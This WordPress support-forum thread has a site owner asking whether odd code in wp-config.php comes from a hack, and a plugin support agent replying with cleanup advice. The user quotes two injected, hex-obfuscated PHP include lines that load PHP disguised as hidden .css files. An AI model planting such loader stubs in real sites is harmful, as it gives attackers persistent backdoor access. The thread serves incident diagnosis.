Title: hacker attack? Last modified: June 16, 2024 --- # hacker attack? * Resolved [Beti](https://wordpress.org/support/users/diebeti/) * (@diebeti) * [2 years ago](https://wordpress.org/support/topic/hacker-attack-5/) * Hello 🙂 * I found the following lines in my wp-config: * /ff874/ $ra1f = “/var/www/web135014/html/word\x70ress/w\x70\x2dincludes/js/cro\ x70/.6aaa2d4f.css”; if (1){ @include_once /* okh */ ($ra1f); } /ff874/ The css file (6aaa2d4f.css) referenced contains php code, as I have seen. Google Chrome keeps telling me that my website is dangerous. The AIOS plugin has also independently switched off the option “File and folder permissions in WordPress regulate access and read and write rights” and has changed the current permission for wp-config. php. Is it possible that the AIOS plugin creates all of this itself or is this an indication of a hacker attack? * The page I need help with: _[[log in](https://login.wordpress.org/?redirect_to=https%3A%2F%2Fwordpress.org%2Fsupport%2Ftopic%2Fhacker-attack-5%2F%3Foutput_format%3Dmd&locale=en_US) to see the link]_ Viewing 5 replies - 1 through 5 (of 5 total) * Plugin Support [hjogiupdraftplus](https://wordpress.org/support/users/hjogiupdraftplus/) * (@hjogiupdraftplus) * [2 years ago](https://wordpress.org/support/topic/hacker-attack-5/#post-17828440) * Hi [@diebeti](https://wordpress.org/support/users/diebeti/), * No AIOS do not add such code. Generally, wp-config.php permission should be ` 0640` * But somehow if the hacker code is added in plugin or file upload as php file it allows to edit the wp-config.php as per permission ( generally many plugins/ wordperss install writes to wp-config.php ) . you can change it to `0400` once you removed that hacked code in wp-config.php to it will not be writable. * It is an indication of hacker code. please take backup of it. check which files have recently been added if possible upgrade the WordPress files, Pluings / themes files and cross check in wp-content there is no any such php file. * Regards * Thread Starter [Beti](https://wordpress.org/support/users/diebeti/) * (@diebeti) * [2 years ago](https://wordpress.org/support/topic/hacker-attack-5/#post-17830038) * Hello [@hjogiupdraftplus](https://wordpress.org/support/users/hjogiupdraftplus/), thank you for the answer 🙂 Is the following really from AIOS? * aios-bootstrap.php * > /** > - [@version](https://wordpress.org/support/users/version/) 1.0.2 > - WARNING: Please do not delete this file. > * This will cause PHP to throw a fatal error and render your site unusable. > - * To safely delete this file, please check both your .user.ini file and > your php.ini file and ensure this file is not set in the auto_prepend_file > directive. > - * Please ask your web hosting provider if you need guidance with executing > the aforementioned steps. > */$GLOBALS[‘aiowps_firewall_rules_path’] = ** > DIR**.’/wp-content/uploads/aios/firewall-rules/’; > $GLOBALS[‘aiowps_firewall_data’] = array( > ‘ABSPATH’ => ‘/var/www/web……/html/ > wordpress/’,); * Greetings 🙂 * Plugin Support [hjogiupdraftplus](https://wordpress.org/support/users/hjogiupdraftplus/) * (@hjogiupdraftplus) * [2 years ago](https://wordpress.org/support/topic/hacker-attack-5/#post-17830853) * Hi [@diebeti](https://wordpress.org/support/users/diebeti/) * Yes `aios-bootstrap.php` is from AIOS plugin. * It is right now defining `aiowps_firewall_rules_path` and `aiowps_firewall_data` global variable and including firewall file * `all-in-one-wp-security-and-firewall/classes/firewall/wp-security-firewall.php` * if other code is inside that file then it is malware code. * Regards * Thread Starter [Beti](https://wordpress.org/support/users/diebeti/) * (@diebeti) * [1 year, 12 months ago](https://wordpress.org/support/topic/hacker-attack-5/#post-17843744) * Hello, thank you for your answer. 🙂 Now I keep having the problem that, despite the security plugin, there are probably “malicious” files on my blog. I then delete them again and again. Somewhere in a file, after a short time, a line is always added to an existing file, such as this: * > “/*390d1*/ $rsc4no = “/var/www/web135014/htm\x6c/wordpress/wp\x2dinc\x6cudes/ > b\x6cocks/media\x2dtext/.c93b5c62.css”; if (214 + 43){ @include_once /* sxwfl*/( > $rsc4no); } /*390d1*/” * – then to a new one created file, which is usually disguised as a CSS file, but contains PHP lines. In addition, the write permissions from wp-config.php are automatically implemented each time. I had set them to 400 as you suggested and today they were back to 755. But I don’t see any changes in the wp-config. php. But my database password can be seen there. Is it possible that the password can also be read by others? I also reinstalled WordPress and renewed all the plugins. * Greetings 🙂 * ![Symbol „Von der Community überprüft“](https://wordpress.org/e3810c30-2d49-40e1- b064-792edfa6aba5) * Plugin Support [hjogiupdraftplus](https://wordpress.org/support/users/hjogiupdraftplus/) * (@hjogiupdraftplus) * [1 year, 12 months ago](https://wordpress.org/support/topic/hacker-attack-5/#post-17844671) * Hi [@diebeti](https://wordpress.org/support/users/diebeti/), * AIOS has a list of features which provides certain level security. * In your case somehow the PHP file execution code got uploaded might be due to a plugin or ftp account hack and it is beyond of AIOS. * It needs to indentify backdoor script which keeps writing the code and changing permission of wp-config.php file. Also the reason how tha backdoor script uploaded there. * You need to get help of the developer or malware removal service provider for WordPress. * In wp-config.php DB password required to access by the WordPress Code file for Data Operation. * Regards Viewing 5 replies - 1 through 5 (of 5 total) The topic ‘hacker attack?’ is closed to new replies. * ![](https://ps.w.org/all-in-one-wp-security-and-firewall/assets/icon-256x256. png?rev=2798307) * [All-In-One Security (AIOS) – Security and Firewall](https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/) * [Frequently Asked Questions](https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/#faq) * [Support Threads](https://wordpress.org/support/plugin/all-in-one-wp-security-and-firewall/) * [Active Topics](https://wordpress.org/support/plugin/all-in-one-wp-security-and-firewall/active/) * [Unresolved Topics](https://wordpress.org/support/plugin/all-in-one-wp-security-and-firewall/unresolved/) * [Reviews](https://wordpress.org/support/plugin/all-in-one-wp-security-and-firewall/reviews/) ## Tags * [code](https://wordpress.org/support/topic-tag/code/) * [php](https://wordpress.org/support/topic-tag/php/) * [wp-config](https://wordpress.org/support/topic-tag/wp-config/) * 5 replies * 2 participants * Last reply from: [hjogiupdraftplus](https://wordpress.org/support/users/hjogiupdraftplus/) * Last activity: [1 year, 12 months ago](https://wordpress.org/support/topic/hacker-attack-5/#post-17844671) * Status: resolved